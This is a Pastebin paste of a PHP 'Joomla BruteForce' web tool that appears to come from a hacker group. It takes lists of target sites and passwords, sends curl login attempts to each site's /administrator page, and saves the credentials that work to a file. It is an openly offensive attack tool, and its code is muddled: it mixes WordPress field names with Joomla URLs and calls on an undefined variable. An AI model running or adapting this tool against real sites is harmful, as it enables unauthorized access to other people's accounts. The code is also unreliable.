Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- echo '<html>
- <head>
- <link href="https://image.ibb.co/j9hReU/cze.png" type="image/x-icon" rel="shortcut icon" />
- <meta name="author" content="CZE" />
- <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
- <meta name="description" content="CZE" />
- <title>Joomla BruteForce</title>
- <style type=\'text/css\'>
- input[type=submit], input[type=button], input[type=reset]{
- text-align:center;
- background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
- border:1px solid #4D4D4D;
- color:#FFFFFF;
- border-top-color:#565656;
- padding:4px 6px;
- margin:4px 5px;
- height:16px;
- -moz-box-shadow:0 0 1px black;
- -webkit-box-shadow:0 0 1px black;
- box-shadow:0 0 1px black;
- text-shadow:0 1px black;
- -moz-border-radius:4px;
- -webkit-border-radius:4px;
- -khtml-border-radius:4px;
- border-radius:4px;
- height:23px;
- }
- input[type=text], input[type=password]{
- background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
- border:1px solid #4D4D4D;
- color:#CCCCCC;
- border-top-color:#565656;
- -moz-box-shadow:0 0 1px black;
- -webkit-box-shadow:0 0 1px black;
- box-shadow:0 0 1px black;
- -moz-border-radius:4px;
- -webkit-border-radius:4px;
- -khtml-border-radius:4px;
- border-radius:4px;
- height:18px;
- margin-left: 5px;
- }
- input , textarea , button , body , caption , table ,area , option {
- outline:none;
- transition: all 0.20s ease-in-out;
- -webkit-transition: all 0.25s ease-in-out;
- -moz-transition: all 0.25s ease-in-out;
- border-radius:3px;
- -webkit-border-radius:3px;
- -moz-border-radius:3px;
- //border:1px solid rgba(0,0,0, 0.2);
- /* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
- }
- input , textarea {
- background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
- }
- input , textarea {
- outline:none;
- transition: all 0.20s ease-in-out;
- -webkit-transition: all 0.25s ease-in-out;
- -moz-transition: all 0.25s ease-in-out;
- border-radius:3px;
- -webkit-border-radius:3px;
- -moz-border-radius:3px;
- border:1px solid rgba(0,0,0, 0.2);
- }
- input:focus, textarea:focus {
- outline: 0;
- border-color: rgba(82, 168, 236, 0.8);
- -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
- overflow: auto;
- }
- .x1 {}
- .x2 {font-size:13px;
- background-color:green;
- color:black;}
- hr {color:white;}
- a {color:black;}
- #x5 {
- font-family:tahoma;}
- .d1 {color :#C17E0B;
- font-family:tahoma;
- font-size:13px;
- font-weight:bold;}
- #d4 {color:#C17E0B;
- font-family:tahoma;
- font-weight:bold;}
- </style>
- </head>
- </br></br>
- <center><b><font >-=JOOMLA BRUTEFORCE=-</font></b><br /><br /><br />
- <center><b><font >Get Password from configuration.php</font></b><br /><br /><br />
- <style>
- body {
- background-image:url("https://preview.ibb.co/b1sEZU/kaneki.png");
- background-repeat: no-repeat;
- background-size: 100% 100%;
- </style>
- <form method="post" action="" enctype="multipart/form-data">
- <table width="50%" border="0">
- <tr><td><p ><font class="d1">User :</font>
- <input type="text" name="usr" value=admin size="15"> </font><br /><br /></p>
- </td></tr>
- <tr><td><font class="d1">Sites list :</font>
- </td><td><font class="d1" >Pass list :</font></td></tr>
- <tr><td>
- <textarea name="sites" cols="40" rows="13" ></textarea>
- </td><td>
- <textarea name="w0rds" cols="20" rows="13" >
- admin
- 123456
- password
- 102030
- 123123
- 12345
- 123456789
- pass
- test
- admin123
- demo
- !@#$%^
- 0
- 01
- 02
- 03
- 1
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 2
- 20
- 3
- 3com
- 4
- 5
- 6
- 7
- 8
- 9
- ILMI
- a
- a.auth-ns
- a01
- a02
- a1
- a2
- abc
- about
- ac
- academico
- acceso
- access
- accounting
- accounts
- acid
- activestat
- ad
- adam
- adkit
- admin
- administracion
- administrador
- administrator
- administrators
- admins
- ads
- adserver
- adsl
- ae
- af
- affiliate
- affiliates
- afiliados
- ag
- agenda
- agent
- ai
- aix
- ajax
- ak
- akamai
- al
- alabama
- alaska
- albuquerque
- alerts
- alpha
- alterwind
- am
- amarillo
- americas
- an
- anaheim
- analyzer
- announce
- announcements
- antivirus
- ao
- ap
- apache
- apollo
- app
- app01
- app1
- apple
- application
- applications
- apps
- appserver
- aq
- ar
- archie
- arcsight
- argentina
- arizona
- arkansas
- bd
- bdc
- be
- bea
- beta
- bf
- bg
- bh
- bi
- billing
- biz
- biztalk
- bj
- black
- blackberry
- blog
- blogs
- blue
- bm
- bn
- bnc
- bo
- bsd0
- bsd01
- bsd02
- bsd1
- bsd2
- bt
- bug
- buggalo
- bugs
- bugzilla
- build
- bulletins
- burn
- burner
- buscador
- buy
- bv
- bw
- by
- bz
- c
- c.auth-ns
- ca
- cache
- cafe
- calendar
- california
- call
- calvin
- canada
- canal
- canon
- careers
- catalog
- cc
- cd
- cdburner
- cdn
- cert
- certificates
- certify
- certserv
- certsrv
- cf
- cg
- cgi
- ch
- channel
- channels
- charlie
- charlotte
- chat
- chats
- chatserver
- check
- checkpoint
- chi
- chicago
- ci
- cims
- cincinnati
- cisco
- citrix
- ck
- cl
- class
- classes
- classifieds
- classroom
- cleveland
- clicktrack
- client
- clientes
- clients
- club
- clubs
- cluster
- clusters
- cm
- cmail
- cms
- cn
- co
- cocoa
- code
- coldfusion
- colombus
- colorado
- columbus
- com
- commerce
- commerceserver
- communigate
- community
- compaq
- compras
- con
- concentrator
- conf
- conference
- </textarea>
- </td></tr><tr><td>
- <font >
- <input type="submit" name="x" value="start" id="d4">
- </font></td></tr></table>
- </form></center>';
- @set_time_limit(0);
- if($_POST['x']){
- echo "<hr>";
- $sites = explode("\n",$_POST["sites"]);
- $w0rds = explode("\n",$_POST["w0rds"]);
- $Attack = new Wordpress_brute_Force(); // Active Class
- foreach($w0rds as $pwd){
- foreach($sites as $site){
- $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
- flush();flush();
- }
- }
- }
- # Class & Function'z
- function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
- class Wordpress_brute_Force{
- public function check_it($site,$user,$pass){ // print result
- if(eregi('profile.php',$this->post($site,$user,$pass))){
- echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/'>$site/wp-admin/</a></b></span><BR>";
- $f = fopen("configuration.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/\n"); fclose($f);
- flush();
- }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
- }
- public function post($site,$user,$pass){ // Post -> user & pass
- $login =$site.'/administrator';
- $to = $site.'/administrator';
- $token = $this->extract_token($site);
- $log = array ('Log In','دخول');
- $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','jm-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$login);
- @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
- @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
- curl_setopt($curl,CURLOPT_TIMEOUT,20);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- }
- public function extract_token($site){ // get token from source for -> function post
- $source = $this->get_source($site);
- preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
- return $token[1][0];
- }
- public function get_source($site){ // get source for -> function extract_token
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$login);
- @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
- @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,20);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- }
- }
- ?>
Add Comment
Please, Sign In to add comment